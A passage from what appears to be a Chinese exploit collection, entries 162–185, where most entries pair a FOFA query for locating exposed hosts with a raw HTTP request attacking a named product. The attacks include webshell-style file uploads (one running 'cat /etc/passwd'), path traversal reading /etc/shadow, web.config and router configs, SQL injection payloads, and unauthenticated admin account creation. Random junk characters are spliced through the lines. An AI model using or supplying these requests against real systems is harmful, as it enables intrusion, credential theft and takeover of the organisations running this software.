/ C" {) R8 ^( R- N</soap:Body>5 q- E. v( h) N& j+ {6 Y% O% n1 R( R
</soap:Envelope>' ?6 |$ t8 W6 }/ w0 Z- ~
$ i, ]! k$ _; P) W* h6 L3 X9 e8 Q5 b5 r9 }
http://x.x.x.x/dizxdell.aspx
! ^/ P1 Z: ]& b7 M: W5 I* a. F! e4 G" V8 w$ a2 X# b* B
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传" q5 O' Y; [5 B* _6 p6 q1 C3 r
FOFA: app="和丰山海-数字标牌"$ {, L) D+ L. I
POST /QH.aspx HTTP/1.17 Z+ {* C1 \% G$ t
Host: x.x.x.x
& D: k) z! w1 @5 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
. \8 `: m/ T( N3 c7 \Connection: close
' K( L3 y, {, n5 D8 i/ zContent-Length: 583
, L8 j0 U4 O7 T- dContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
. ]2 S% _6 J+ J3 \, j" `, [Accept-Encoding: gzip' b+ r% F8 P1 ?# A/ I H
6 x/ U, f# A k( X [! j3 Z
------WebKitFormBoundaryeegvclmyurlotuey
7 ?0 V9 I0 [5 i+ P" |, f+ r3 }2 s. ?Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx") A8 m: c; ^) w! Y/ B# U
Content-Type: application/octet-stream
$ L0 V9 Q0 J1 g3 @) l5 O* O, [: `1 F! A8 m1 e' ` n" }1 ]
<% response.write("ujidwqfuuqjalgkvrpqy") %>. {+ b% n) A4 f5 p/ ^1 u r
------WebKitFormBoundaryeegvclmyurlotuey6 J0 B* I, }' T' B& ?5 P
Content-Disposition: form-data; name="action"
: A, E+ M9 e- j/ Z7 ?5 {6 ?
, _% L, }* R3 X$ f' _3 l7 C; e, @upload D2 H" @ d4 ]# Q
------WebKitFormBoundaryeegvclmyurlotuey$ o' w# |. B, u4 K: }; \$ [! e6 E: L
Content-Disposition: form-data; name="responderId"
0 P4 h/ Z& F* Z X/ {' ?1 n2 [
7 u8 z0 R! V: L5 l% P3 _ResourceNewResponder9 \6 A) C% q9 F
------WebKitFormBoundaryeegvclmyurlotuey& { o& _ a6 R' m) A2 @3 R" q# [; D
Content-Disposition: form-data; name="remotePath"
- x' L; d2 }: ]0 T5 [0 r4 ?" N' W* S' _* q
/opt/resources
6 Q M4 r) |2 _% z1 J! `------WebKitFormBoundaryeegvclmyurlotuey--
4 s# M6 J0 j# w8 N! e6 o( \: S
1 E/ B" Q/ j2 [7 o3 ?2 \% F9 [6 h S2 x( {* r
http://x.x.x.x/opt/resources/kjuhitjgk.aspx+ e/ w7 _* i0 U
( Q- o( d) N8 U+ x
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
) L& S4 s8 |4 M4 L( HFOFA: icon_hash="-795291075"
* M# a0 t7 v& _: A2 w$ sPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
$ F. J3 `' m8 `! S7 `1 M# bHost: x.x.x.x; @7 `5 y, I% Q: X$ f1 `$ U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36) f, N1 a+ j7 n. z: ~$ b. z
Connection: close5 n9 L, G" P1 K' k# Y, j/ a
Content-Length: 293
0 e0 e( n- N5 H3 t. W- {: |Accept: */*
, K) I9 w8 J5 }5 ?6 t. G' UAccept-Encoding: gzip, deflate
2 I- A" {" \" a0 H+ vAccept-Language: zh-CN,zh;q=0.95 K; B: x- Z5 B% T' M' b N
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
9 l8 X6 a# k. W |' e
6 W* d- l1 l' o' _1 U9 k) \$ [------iiqvnofupvhdyrcoqyuujyetjvqgocod
- b# T: W9 n+ W* }( NContent-Disposition: form-data; name="name"0 ? |7 f/ q# G# Q7 r, j, _
- S; e% K6 E; p) s1.php3 c+ ]8 D4 z2 @: U- B* G
------iiqvnofupvhdyrcoqyuujyetjvqgocod
3 V! F; B- r% J2 Z. Q( \( h& xContent-Disposition: form-data; name="upfile"; filename="1.php"9 W( n% K v5 T2 U- A6 z2 v4 e
Content-Type: image/jpeg
- c, p8 p# B+ W4 i* M6 |: @9 L+ ~. ?9 C2 i7 t/ _! g. L6 [
rvjhvbhwwuooyiioxega
1 D1 N( a4 s& g/ E------iiqvnofupvhdyrcoqyuujyetjvqgocod--
# a5 S. M; O, M! k/ `, r8 v6 E& e4 \7 ~# X
; Z- w# S Z! \; G% n$ D3 p
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
1 L K0 \+ O" n+ V2 \8 ?$ }3 GFOFA: title="智慧综合管理平台登入"
. X, w: Y( \+ L0 BPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.12 ?" l/ u1 x# X$ D. t
Host: x.x.x.x2 R: R' p1 T4 {$ ^4 f. H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0; Q3 J: u. b, x; T1 M6 D. _
Content-Length: 288: H7 [: X# X) H/ C( P+ C3 D
Accept: application/json, text/javascript, */*; q=0.017 M( [% i0 t! p+ z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
4 r. k" I' y; F' N7 L2 xConnection: close
9 B& t2 R& J, mContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl# @# x4 y# ^3 q: l% ?! I. c$ V' G
X-Requested-With: XMLHttpRequest
4 m9 y- \( P$ A3 e+ `4 ^Accept-Encoding: gzip
8 h, o6 h' ~0 j( Y4 r4 l1 x
. ^% v: m+ B4 S5 L2 H1 P------dqdaieopnozbkapjacdbdthlvtlyl
5 O" ~0 m) s- R' }Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"/ H- }( Z9 h9 d
Content-Type: image/jpeg
0 w# w8 s2 Z( f# i) W# W
( | ?1 [& u R4 r* n& s; j3 \% [<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>" R7 O7 P% R( u' i1 q; g. L; q! d
------dqdaieopnozbkapjacdbdthlvtlyl--3 O' X, k) s& ^+ o9 J5 T6 j
4 ?. W3 h$ }2 p
" s2 ^2 V! q" H1 ?8 p- yhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
& l9 b0 l& B1 n4 s8 T5 \) C8 v. E5 ?7 E& Y- y+ C" n( Z
165. OrangeHRM 3.3.3 SQL 注入
; w+ W6 R6 e4 kCVE-2024-36428" ^7 k z/ J/ J) l1 Z8 n' o
FOFA: app="OrangeHRM-产品"3 v* U6 S# m2 N8 m5 h8 Y
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END)) Y! P4 x# i1 Y( }* @5 I0 U: ]
7 Z" n' q! d. K$ E L: Z x! Y( \% d/ k& b$ p4 N0 J
166. 中成科信票务管理平台SeatMapHandler SQL注入+ n: ]8 x/ {! x$ T+ I! W
FOFA:body="技术支持:北京中成科信科技发展有限公司"
# t1 U; R/ I1 q5 zPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
0 d+ x, w: l0 A- o; z$ NHost:
! s/ V* ]+ F, T5 O" Y6 Q- vPragma: no-cache& v* T5 x, {1 B8 ]5 p1 a* | b
Cache-Control: no-cache
+ r" P1 k1 x8 }% G; ]3 ZUpgrade-Insecure-Requests: 1
T5 U9 ^: y3 D& M% ^: c3 xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
0 p+ {# b' t1 J" v2 G& @1 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# D; b9 M# r( DAccept-Encoding: gzip, deflate' r1 @+ U9 e9 T n1 `+ S. U) u
Accept-Language: zh-CN,zh;q=0.9,en;q=0.81 {1 @7 `# b2 c) P, `7 O
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
. F+ w) I( v$ y& J1 EConnection: close
% k; H; {( N) D1 h. z* YContent-Type: application/x-www-form-urlencoded
% Y5 u. j2 o( Z* V& `/ I& MContent-Length: 89 W7 q8 |' @( S& N+ I( S
4 @ @* \7 _+ l% x; x' E7 b# q
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE. r' D+ F0 k" |: A
/ l+ U9 i) P0 H; M( Z ]
# w/ y. U5 V9 L
167. 精益价值管理系统 DownLoad.aspx任意文件读取
# i- b& M+ ?8 o" n2 \ u3 eFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"7 z' X9 C: N0 S1 A X
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
! S( d! q' e% w8 v3 L! \Host:' I5 V0 `( u% @7 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( L; H9 K* H. L- ]4 \Content-Type: application/x-www-form-urlencoded q2 G0 z! O/ n& |" Y: T
Accept-Encoding: gzip, deflate/ a1 m0 X1 X' V7 d
Accept: */*. B6 }, ]' G5 H
Connection: keep-alive9 W' i3 O1 |8 W4 H7 y* a
; l" b! q- [+ Y: z' V
6 D7 ~* I7 G5 F' D1 D
168. 宏景EHR OutputCode 任意文件读取
+ q) @" }1 J/ {6 kFOFA:app="HJSOFT-HCM": F4 i* p( B5 O+ u9 a- `
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
# D0 J. C" f, H0 N4 uHost: your-ip
1 b3 ^0 b5 e' M, r9 U: uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36* ^* `9 c. W. T! q: U+ V
Content-Type: application/x-www-form-urlencoded6 e1 ]$ n4 z( x+ Q9 G
Connection: close6 K0 Y3 q5 f- E- q4 k+ `, W
6 U5 Q& q! a3 {* o: o8 W
9 `: i! e8 p% e% f3 P- k
) d: f6 {8 ^- [. U: ^1 h n169. 宏景EHR downlawbase SQL注入
6 a/ R9 ?. y4 oFOFA:app="HJSOFT-HCM"
8 X. [8 _# M# W9 X0 CGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
* ~0 W7 {/ o2 T4 XHost: your-ip! K$ F E6 ? u" J: H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- x& B4 }+ `- k' \0 I& U+ w
Accept: */*
& Z. `) ^' q: \* s0 e/ \- B7 @+ _Accept-Encoding: gzip, deflate
- s# a) X) `& RConnection: close+ F% d+ S" U& q0 b, @7 m: t- _
) h+ s( h. P% N0 Y: q" }; n
5 I( } f# n$ y- ~. }+ r6 r3 Q3 ^- ~& u5 z X5 j% U* `
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
7 g' }3 y9 l: T. b7 t( n2 TFOFA:body="/general/sys/hjaxmanage.js"3 @! C( r2 Y( q* R& m$ a# R
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
/ |1 I L4 u+ f, j+ E/ yHost: balalanengliang
9 j9 b6 Y9 J; w* o3 I' J0 jUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# d4 i: E. B+ ^0 c5 Z( E2 G. d
Content-Type: application/x-www-form-urlencoded, i6 y0 o7 b1 X4 r
; X0 ^! @% [) T
filename=../webapps/ROOT/WEB-INF/web.xml
+ r v5 c+ x; E# a1 X/ Q; q, o9 |, R" n
) A4 A8 B$ ^1 Q3 W171. 通天星CMSV6车载定位监控平台 SQL注入5 o+ j: _5 k# {! G
FOFA:body="/808gps/"6 U O4 H% x* S8 p. e- n
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1# D, I( A% Z8 F1 C. X2 G" o
Host: your-ip
2 E" e+ K7 c- p7 l5 e( OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.03 d8 d# |1 _' }. {
Accept: */*. ~4 W- e" J. ~; j2 w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 h, V9 [0 j* ?0 R: P! Q, TAccept-Encoding: gzip, deflate4 q5 ^ V8 u4 q+ m! v) Q+ H
Connection: close! s9 d( u; i3 f: r) B$ O1 A# h
$ L6 P. i& L6 Q# }' {% A7 u2 }& c8 K$ @) t
9 v8 M0 n5 Q( K7 K" c
- Z8 `/ K m/ D# f
172. DT-高清车牌识别摄像机任意文件读取! K6 D1 U9 h0 _1 [! {0 M8 k
FOFA:app="DT-高清车牌识别摄像机"0 C% z% [' I! W
GET /../../../../etc/passwd HTTP/1.1* |" y8 n o: p1 ]7 q) O4 B4 n
Host: your-ip
2 u1 Q3 l4 h0 K) w% }) kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 ^* x; I9 o1 l( v" h9 X
Accept-Encoding: gzip, deflate
) y4 E; z3 S6 [" f% Z; b2 F% Y- C% UAccept: */*
- R) t3 C9 \" [2 I, DConnection: keep-alive
/ G/ f' s+ j% v2 P' B* D" X. P4 G
2 M. i& o- _9 q$ ` V x7 [! C+ R& O7 q
9 u) m# o0 u! c3 B
173. Check Point 安全网关任意文件读取4 f0 g8 d* z8 \1 A; z( ~
CVE-2024-24919
. l X; I" [: \3 l, y; _5 x* g+ EFOFA:app="Check_Point-SSL-Network-Extender"
$ o# C. c# _+ _POST /clients/MyCRL HTTP/1.1" W/ T; h0 C( f- q2 Z
Host: your-ip Y, l# d, A0 D7 J2 C
Content-Type: application/x-www-form-urlencoded. F( T: ?5 m9 V
( L7 P8 ?7 ]7 z7 Q* `
aCSHELL/../../../../../../../etc/shadow4 c- t% k* m) b( w n
5 ^+ J! v C) H
: J5 \: H& l8 |& `" Y
% q$ k9 T$ B$ n! o2 `8 C! D8 a174. 金和OA C6 FileDownLoad.aspx 任意文件读取
3 T5 J8 d6 h: r3 q9 A; zFOFA:app="金和网络-金和OA"- i* k- b$ I8 V4 T) X
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
4 R- h* X) A/ _, THost: your-ip3 a) N3 m0 M! f e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.361 K3 L8 N k) y9 Q0 A0 r# ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, f& Y) i! F- \; Q0 G" t$ _, r4 b
Accept-Encoding: gzip, deflate, br l- S8 _3 T( N' ]2 r. n
Accept-Language: zh-CN,zh;q=0.99 N. q* M1 i$ J% U
Connection: close2 A, R: v9 a3 M& y
# L5 [9 M; @ U5 O1 _5 A$ S% A6 g) x( b9 S
7 H: D6 T" Y8 G+ y4 e3 g
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入) R' M. N+ g0 S. D. I, `
FOFA:app="金和网络-金和OA"
, B! s7 B/ N `/ r$ H/ p: ~GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1/ h# I, V0 v$ d7 k
Host:8 m: l9 ?& a+ R' p; v
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; i' j0 d1 V: @5 uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ j$ X, R6 h1 q* O0 b/ XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 Q/ v, W9 t' q6 V* ^3 i3 Z
Accept-Encoding: gzip, deflate
% T/ d. P6 ~" d$ Z" D- Q6 G ]Connection: close% `7 Y3 H2 {0 g3 q/ M& n E" q
Upgrade-Insecure-Requests: 1
$ ^" q# z9 z% J, v2 X l7 I: `: D
5 U* E6 J2 n/ F; Z& @/ D
" V2 Q. C3 `4 f8 j5 R: T9 n& v9 v# h5 v176. 电信网关配置管理系统 rewrite.php 文件上传
B3 ]( C, t' j2 F2 F2 _1 vFOFA:body="img/login_bg3.png" && body="系统登录"
; f3 f' F: F% m9 h, z* _POST /manager/teletext/material/rewrite.php HTTP/1.16 T, n" W, L7 d5 n N* V
Host: your-ip- @0 I- K+ Z+ W9 M) ~+ B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
9 N0 I* c1 }6 W/ C( `Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
{* x9 [* K4 M/ \Connection: close% v! [, y% [2 Y( r& X
4 y/ V } @) w' u# i2 v$ S------WebKitFormBoundaryOKldnDPT
( w D* |* o" ~" E2 A% g2 v. uContent-Disposition: form-data; name="tmp_name"; filename="test.php"! o) F+ q4 B6 g- u
Content-Type: image/png
- q3 E |4 K+ m+ i }& Y8 _6 T7 q R+ ]
<?php system("cat /etc/passwd");unlink(__FILE__);?>. @6 M9 [3 e& m1 x9 S( i
------WebKitFormBoundaryOKldnDPT
" I7 I6 V( B! b4 A- u! \Content-Disposition: form-data; name="uploadtime"; _9 P$ |( U5 F! G
! g" Y. h- o2 d3 W0 a/ N
7 y( C) \% m2 y0 _------WebKitFormBoundaryOKldnDPT--
d5 y) @1 P1 e+ @# d% i( N' \$ F+ A" i
9 ^7 ~' ]8 {3 r5 h3 F
3 D: @. q/ o& a# R! H/ c" L
177. H3C路由器敏感信息泄露' j4 C- G) k C9 ]) V# ~; O
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
' p& ]* w4 Q. ~. J- W& {/userLogin.asp/../actionpolicy_status/../M60.cfg$ l3 n2 W; J' P, m
/userLogin.asp/../actionpolicy_status/../GR8300.cfg5 Y+ j5 o. N* ~1 p: Z% O8 N( J' @" A
/userLogin.asp/../actionpolicy_status/../GR5200.cfg6 D6 l, \9 ^; ~
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
q9 C( D7 v0 C6 E" O, M/userLogin.asp/../actionpolicy_status/../GR2200.cfg( u/ S* y9 {9 _+ l/ C
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg8 O; t9 C2 {, e+ W* f
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg1 r( h- x' q# r% k+ S
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg( l: O# L4 d4 d* \& Z! z. Z
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
# P$ I; f$ K. k* h9 }: R$ x/ g9 h/userLogin.asp/../actionpolicy_status/../ER5200.cfg5 ~0 _+ w Z; R) A5 r% z2 ]
/userLogin.asp/../actionpolicy_status/../ER5100.cfg. F( Q2 s3 v) n
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
' Y+ S# M8 _5 N; r% M/userLogin.asp/../actionpolicy_status/../ER3260.cfg" w- f8 `5 X- I
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg( h; D' h/ K% Z6 {
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
; k/ I1 m9 s; K$ I4 n( q/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
4 T/ ]2 L2 e q; L$ l8 h/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
! n. `2 O# c m; q" p/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg# l. m) B8 b9 }% u' K7 V2 R
/userLogin.asp/../actionpolicy_status/../ER3100.cfg! t. I* b- L' l" p6 T
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
# f1 Y9 z" j" W: g6 a0 ^9 j/ d+ X
! L) k; V% F* C! b; t0 L! `; W
" c3 I5 f! q- D* c( Y178. H3C校园网自助服务系统-flexfileupload-任意文件上传0 p& A, B$ R7 c, E) A* J$ t
FOFA:header="/selfservice"1 e: p% W0 H3 x5 `4 o5 l* s& m
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
5 h5 k2 {2 r* D$ ^/ P* GHost:
5 c+ [; {- z5 {4 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
4 ?0 k1 X8 v+ V; t7 G! n3 S1 JContent-Length: 252
& y- m. {; H* x; B: l$ X( wAccept-Encoding: gzip, deflate
5 ^8 W' k" |* ]' U7 T( Y$ JConnection: close0 @% \/ N* m$ f
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l" x% b0 J. v: z( t
-----------------aqutkea7vvanpqy3rh2l
5 Q D, @7 B1 V$ y( gContent-Disposition: form-data; name="12234.txt"; filename="12234"' N5 Q! V& d- q4 g' @, G
Content-Type: application/octet-stream
/ `) B8 a1 z2 ]' q( dContent-Length: 255( e6 O& Z# `2 @! E+ B' n, W
3 N* t7 n. s: F0 o, \* O5 {# S
12234
+ p: }2 `6 n7 x$ Q-----------------aqutkea7vvanpqy3rh2l--' r; e U$ g1 r O4 d
3 T: y9 G! V& `! H9 a+ l# ?( ?
8 c1 Q3 u8 c% i1 r9 j
GET /imc/primepush/%2e%2e/flex/12234.txt
, X: h, U( i. A
1 C$ {' A& V( ~: ~
! _' M) Y; P* E+ {& o179. 建文工程管理系统存在任意文件读取 e/ t/ s) w, \$ P J8 x
POST /Common/DownLoad2.aspx HTTP/1.1$ M. A; E! l5 h" Z( g5 P! [7 F
Host: {{Hostname}}
; e4 G$ d. s8 k) r$ o/ OContent-Type: application/x-www-form-urlencoded4 ~$ o2 {+ ^, B: X2 S G
User-Agent: Mozilla/5.07 P5 K0 W* t& G+ {5 V" a4 b, g% q
9 R% Q& L: H% A
path=../log4net.config&Name=8 @* i' Z7 O* R8 m; G6 C5 z
4 \! U+ z |, X) W8 U! d6 h& l- r" D
V9 j' P% D" Q6 Z# C7 [8 }" |! p180. 帮管客 CRM jiliyu SQL注入
& v! s+ ?7 h7 g, J3 E+ s6 R1 I: QFOFA:app="帮管客-CRM"
. c( Y H# ?5 l$ {& @1 w# n1 {, [# `GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1; m, S4 y7 d+ [4 Z4 a( h+ Q2 `7 E1 K
Host: your-ip
# v6 Y8 D3 K& G& h0 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
, W4 |7 n3 s0 i% _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# s0 r3 S/ {% D. ~, g5 wAccept-Encoding: gzip, deflate1 W, }1 L% O6 D' j& c1 M
Accept-Language: zh-CN,zh;q=0.9
, Z8 l! q n; o/ z3 fConnection: close# K% n8 x$ Z8 W
& h* E" f* D8 _
' I* m! O; a2 @181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
4 _2 Q v! V# ~ O0 zFOFA:"PDCA/js/_publicCom.js"
- B, D: d: f, ^9 m9 kPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
8 `" ]! w7 R+ ?. `' p3 s4 fHost: your-ip
. s( V2 u5 B& {( d4 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36$ u! d+ {& K, \, v" Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 N/ T6 d1 h4 }8 Y2 C4 xAccept-Encoding: gzip, deflate, br
~6 U- Z1 S: G+ I1 _Accept-Language: zh-CN,zh;q=0.99 ~! d# S+ B+ Q5 y8 u
Connection: close
" e' f: |- f5 qContent-Type: application/x-www-form-urlencoded" H, t; V- x n. j9 ~% F- q2 ~8 ]
8 r$ U# d$ s% T/ C$ q
, Y7 m% w, F7 qaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
/ d o5 } E9 s0 H8 f' ~! D2 P- F' Z: F
, h7 w3 a6 Q1 B8 X6 u8 F t182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
4 d5 Y8 F8 h; o `7 _FOFA:"PDCA/js/_publicCom.js"
4 o4 e: q9 Z( w# n3 L' ?" GPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1% D" ]6 V) e9 S
Host: your-ip
% b* A8 r+ r& N. L0 `" OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36; H5 O" u; R4 R5 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, Q6 _% M' Q. v% U
Accept-Encoding: gzip, deflate, br) E5 T2 R' o+ |! e6 N' h
Accept-Language: zh-CN,zh;q=0.9
9 T/ b5 I& Z4 k$ h: Q3 f M6 k9 t: ?Connection: close
4 S3 j5 q8 ]0 e: \0 T6 VContent-Type: application/x-www-form-urlencoded
; G: `/ ?! w4 \: |: e6 V; p3 S- x. l- A4 W' K: D- {* {8 n6 u
) ? C: T' g7 ~- k, ~5 f4 Yusername=test1234&pwd=test1234&savedays=1
( R1 D% H$ d H( R0 o: e8 q
* ]( M. m+ E# k
: ?% b1 n v6 [( e+ Y( \& B183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
+ W; K# L- u0 J! J" ^+ w' e+ U5 iFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
8 I- E t4 N' d% w! h# ZGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1' L) b/ e; K7 U" J9 V
Host: your-ip
! K. M" n) R @) ]3 t1 QUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
, Y! l7 o9 p1 _9 Y1 A! e( i$ _1 [Accept-Charset: utf-8+ f0 C/ `6 m0 b0 B5 p8 F3 N% B! I
Accept-Encoding: gzip, deflate
0 d; o6 D0 d0 q9 r/ h8 J$ lConnection: close( ^9 y& M+ f1 V R: ^& g0 {& @
# c: K( X0 ?6 h0 {2 V1 ~, I4 t
* N2 G2 Q1 g: O9 q8 T Q7 R184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
- e( h' _2 |+ {, m9 U0 {FOFA:server="SunFull-Webs"
' } M3 X! E* I1 JPOST /soap/AddUser HTTP/1.1, R4 X4 i4 ~' ~% @+ y+ B
Host: your-ip- d% ~# m1 d. w; ?! P X
Accept-Encoding: gzip, deflate; K+ p; r+ `) a0 ]" M. ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0; Y. y4 E! x9 ?% T
Accept: application/xml, text/xml, */*; q=0.01" z7 z! F8 m# `; i" |2 d! x8 `
Content-Type: text/xml; charset=utf-8
% P( K$ l, G* m, g+ DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, l7 V: f9 T( Z5 NX-Requested-With: XMLHttpRequest3 ?1 b' X* {" m }1 F) J
! e$ P7 x( ?2 Y9 J
1 _4 _9 q* ~0 W4 yinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')0 v- }+ Q5 d8 g! }) I
2 |+ W3 l8 Y* u f6 n7 K! d9 _, U* P% K
185. 瑞友天翼应用虚拟化系统SQL注入
4 n, ~; W9 k- U6 @$ ?+ }version < 7.0.5.1" _1 |& T9 v" f. G2 g! L
FOFA:app="REALOR-天翼应用虚拟化系统"
